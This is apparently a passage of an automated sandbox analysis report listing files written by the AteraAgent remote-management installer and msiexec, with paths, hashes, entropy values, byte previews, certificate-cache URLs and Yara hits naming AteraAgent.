                                                                                                                                                                                                                                                                          Preview:p...... .... ...>[.7....(....................................................... ...........O>.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):248
                                                                                                                                                                                                                                                                          Entropy (8bit):3.016482586660896
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:kkFklGdttfllXlE/xZ/JtINRR8WXdA31y+NW0y1YbXKw+l1M7GlWB5lL1AWlll:kKn/oZ/8FAUSW0PTKDXM6lWTJ
                                                                                                                                                                                                                                                                          MD5:E8BCDBEB9137B1262DDE058B55AE123B
                                                                                                                                                                                                                                                                          SHA1:EF953F503A18FAC6BD36707CD6307081A4BA5235
                                                                                                                                                                                                                                                                          SHA-256:E2DC7F64CC544FB8FEDAC844E2979D1AF8DB6DFD039E7783EBAEC9F62B14880B
                                                                                                                                                                                                                                                                          SHA-512:2EC5EC31001070466FF155B25FE18D65FEC147E4B71A607CC8650A25EF8699879F9F6BF6D727BE00DA049C1BABDDDBD982E989DF66B7BA5EE415578FB94A346E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:p...... ....f...0.......(....................................................... ........T.~.:.. ...................h.t.t.p.:././.c.r.l.3...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.l...".6.7.3.d.0.d.e.d.-.2.e.1."...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):308
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2220888806886414
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKmfzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:NtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                                          MD5:E39DFEED5AD0135469C2E7F116CEEFCD
                                                                                                                                                                                                                                                                          SHA1:4A677CCAB38E25230CC5BF3634B2EA2FAFE1CA3C
                                                                                                                                                                                                                                                                          SHA-256:F9FDDE420FE7387B08BB911FB45227E6499411E5A7603D5A84FD1C0BF1FFB533
                                                                                                                                                                                                                                                                          SHA-512:CFCDCEEF662B64680FB883AA1B3567D20217A2B9F671CADB2767D602672C7B2306542E867A012EEEC3DCCF869DD9AB3EF1143CC12A6E33E34BCEA7FBCE8BC536
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:p...... .........j..^>..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):412
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5596195368537855
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKO3NfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:23NmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                          MD5:42A498C4DFD8DC79EA7B0D315A12D8A1
                                                                                                                                                                                                                                                                          SHA1:2AD5C0BFAD5BF229313F9E24098BBC7FAB6000DC
                                                                                                                                                                                                                                                                          SHA-256:2604F3F8B2092620E32CC3A09F45F07AD8EF877379AA015D52FD9BFDE4DF3F2C
                                                                                                                                                                                                                                                                          SHA-512:D79A676FFF4689E52BC065880BF820EAB90EB7386A021E5BA90BAD6B411B927F3417366B1B1D707065B7E21B06A57600D7BEAC4DC90C703527ECE521E4F24D99
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:p...... ....(......'....(....................................................... ........).?W>.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):254
                                                                                                                                                                                                                                                                          Entropy (8bit):3.060772882719261
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:kKAVhLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:4jLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                                          MD5:6731764A7D1425504CF1A94640C5589D
                                                                                                                                                                                                                                                                          SHA1:C37014F9710D557AE82A06C7991F09A18AE683EA
                                                                                                                                                                                                                                                                          SHA-256:389E4CC566F5DCD81F395F204BB463E08AD1EACD51B48275CAB9D05AB197C5C3
                                                                                                                                                                                                                                                                          SHA-512:34386E821D4C9FCA44D8CAD6E8AF69AC84F91671519099AB4CA7B88B610B60E886B591F8A880C07CDD7FA1BB316BD49BD5CC4458DF15034DA68CC5FE6EA6C201
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:p...... ....l.......^>..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                                                          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1944
                                                                                                                                                                                                                                                                          Entropy (8bit):5.343420056309075
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:MxHKQg8mHDp684YHKGSI6oPtHTHhAHKKkhHNpaHKlT44HKmHKe60:iqzCYqGSI6oPtzHeqKkhtpaqZ44qmq10
                                                                                                                                                                                                                                                                          MD5:437E4DCFC04CB727093C5232EA15F856
                                                                                                                                                                                                                                                                          SHA1:81B949390201F3B70AE2375518A0FFD329310837
                                                                                                                                                                                                                                                                          SHA-256:5EADB9774A50B6AD20D588FDA58F5A42B2E257A0AA26832B41F8EA008C1EB96B
                                                                                                                                                                                                                                                                          SHA-512:0332C7E5205CF9221172473A841284487ACC111780A58557231FCDE72A5EDB7E7E3EF6C87AB9682A688BC24992A74027F930267B541039BD8757EEF4E2F51A0E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DF42B9C6EAEAA644A5.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DF575961BC4E9CA65E.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DF6A1563904250F70E.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DF758395496BA8A518.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DF9340E6CB357EA061.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):69632
                                                                                                                                                                                                                                                                          Entropy (8bit):0.14727313070261788
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:CnjEubmStedGPdGeqISoedGPdGfMpr7MOOV:ijNyLIBoV
                                                                                                                                                                                                                                                                          MD5:8B75DCDB078C3657C0CB2415C20C2944
                                                                                                                                                                                                                                                                          SHA1:39EEB1D55B0CC800724B9402A7E5602F9D5C016A
                                                                                                                                                                                                                                                                          SHA-256:E2F7421A5749B64489718CA52EDF7099A9A20F5A6847D97379F1B0F0FFD4D3A3
                                                                                                                                                                                                                                                                          SHA-512:5255152B8C3988592E90F1F0C9DD8C7187831306BBB72BFAB2935F5AC88C8065DEE044EEA3CF70ED474DD6E8B3793A4483CF1B7A1D1079B54B888F352AA5D4D8
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9340E6CB357EA061.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DF975FD2E2CDD5436E.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2604139244452048
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:ZCgFukUPveFXJ7T5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:lFTjTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:A60126BE7FFB5493321FA40BDDCD1F01
                                                                                                                                                                                                                                                                          SHA1:F3FC1B5AEE0DABE79D446355EEDD10935A5A84E5
                                                                                                                                                                                                                                                                          SHA-256:61F9983069445C8E242EDF5D1E36054B163F10E2DE5BD7230A11BB12B4E8CF47
                                                                                                                                                                                                                                                                          SHA-512:E7310B82E0771A6A64EE8212E49780DBBF89FF8BF56F2513B689FD993A187969B98F01117B0249498123F6122F2B80FCDFDD6C86EB0A92FEB19C9D44D378FFDA
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF975FD2E2CDD5436E.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DFA23B2DCAA65163F4.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DFB8E4C2B6BEE736E9.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2604139244452048
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:ZCgFukUPveFXJ7T5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:lFTjTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:A60126BE7FFB5493321FA40BDDCD1F01
                                                                                                                                                                                                                                                                          SHA1:F3FC1B5AEE0DABE79D446355EEDD10935A5A84E5
                                                                                                                                                                                                                                                                          SHA-256:61F9983069445C8E242EDF5D1E36054B163F10E2DE5BD7230A11BB12B4E8CF47
                                                                                                                                                                                                                                                                          SHA-512:E7310B82E0771A6A64EE8212E49780DBBF89FF8BF56F2513B689FD993A187969B98F01117B0249498123F6122F2B80FCDFDD6C86EB0A92FEB19C9D44D378FFDA
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB8E4C2B6BEE736E9.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DFC5872F544B03548F.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):1.5756843868543453
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:CJ8Ph9uRc06WXJKFT5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:Nh91BFTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:D36078FC13607F98C31714BEC1ECEABA
                                                                                                                                                                                                                                                                          SHA1:2E863BE55D1FEEA70F4DCF32A46E754C1C7015FE
                                                                                                                                                                                                                                                                          SHA-256:2B33B8B1305B5C18EFAB55AE78BB813B5E465A9BE8365ABB098CD7DE526E0DC1
                                                                                                                                                                                                                                                                          SHA-512:6CFA4F0CA554583F2FD0097236A02083D3029DDA64C39B9FC9B6B9972DB499A0E936220CAE802F85F81F3D9EB6016C3914E71F7B97C1CB5CC949069505F4765C
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFC5872F544B03548F.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DFD5E723F7AA2005AD.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2604139244452048
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:ZCgFukUPveFXJ7T5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:lFTjTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:A60126BE7FFB5493321FA40BDDCD1F01
                                                                                                                                                                                                                                                                          SHA1:F3FC1B5AEE0DABE79D446355EEDD10935A5A84E5
                                                                                                                                                                                                                                                                          SHA-256:61F9983069445C8E242EDF5D1E36054B163F10E2DE5BD7230A11BB12B4E8CF47
                                                                                                                                                                                                                                                                          SHA-512:E7310B82E0771A6A64EE8212E49780DBBF89FF8BF56F2513B689FD993A187969B98F01117B0249498123F6122F2B80FCDFDD6C86EB0A92FEB19C9D44D378FFDA
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFD5E723F7AA2005AD.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DFE1D8FD4611557514.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):1.5756843868543453
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:CJ8Ph9uRc06WXJKFT5B9PqISoedGPdGfMpr7MONStedGPdGRubkZn:Nh91BFTv9iIB7oYZ
                                                                                                                                                                                                                                                                          MD5:D36078FC13607F98C31714BEC1ECEABA
                                                                                                                                                                                                                                                                          SHA1:2E863BE55D1FEEA70F4DCF32A46E754C1C7015FE
                                                                                                                                                                                                                                                                          SHA-256:2B33B8B1305B5C18EFAB55AE78BB813B5E465A9BE8365ABB098CD7DE526E0DC1
                                                                                                                                                                                                                                                                          SHA-512:6CFA4F0CA554583F2FD0097236A02083D3029DDA64C39B9FC9B6B9972DB499A0E936220CAE802F85F81F3D9EB6016C3914E71F7B97C1CB5CC949069505F4765C
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE1D8FD4611557514.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\~DFE81B0F49C0EE8808.TMP

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.07932418623696336
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO1JaKmjU/eC1qtSVky6l/X:2F0i8n0itFzDHFlmJC1c/X
                                                                                                                                                                                                                                                                          MD5:34973CA006F5B4F8735F1713DC4DE595
                                                                                                                                                                                                                                                                          SHA1:81CB07B44C8B3453B30B6D8B29497DC6746D04F5
                                                                                                                                                                                                                                                                          SHA-256:A054CFB0C4063B0878364AD9D93C4C7AB55668D447B7B47DB299D2BCF75BD4D1
                                                                                                                                                                                                                                                                          SHA-512:D5063674ADF20C981CEF367E3E5E6E7ECBF2F80C6BF53AA2A36C623B6D8487BFB3FE67A5B2D74939F5DF5C6B6DB2F924D91E988004D8FE74B6658408618A1518
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          \Device\ConDrv

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):457
                                                                                                                                                                                                                                                                          Entropy (8bit):5.311335275582196
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:Y0rsShlOS0+3dYKJX0pRQO2xOiitGcdnK3rTPm1XqVQ:Y0rBBthW8iUnXPeXh
                                                                                                                                                                                                                                                                          MD5:C7FA96A2AE6B0B4D9C7F3ECFFA3B25AC
                                                                                                                                                                                                                                                                          SHA1:383072AA7888710C47A99779EC88AF36048FC896
                                                                                                                                                                                                                                                                          SHA-256:169FA63892BC80034EDE3DD536F608079757FF0B395CC5D816044FE336304AD2
                                                                                                                                                                                                                                                                          SHA-512:07C4B635630F19EF5D5F603D2AD2C4E09D75F89D457732BC927738E6531225CC0A15353760BF8E497BC9E3FEC50A90EA81EE3E793A2873484CA1C866CC45F5A9
                                                                                                                                                                                                                                                                          Malicious:false
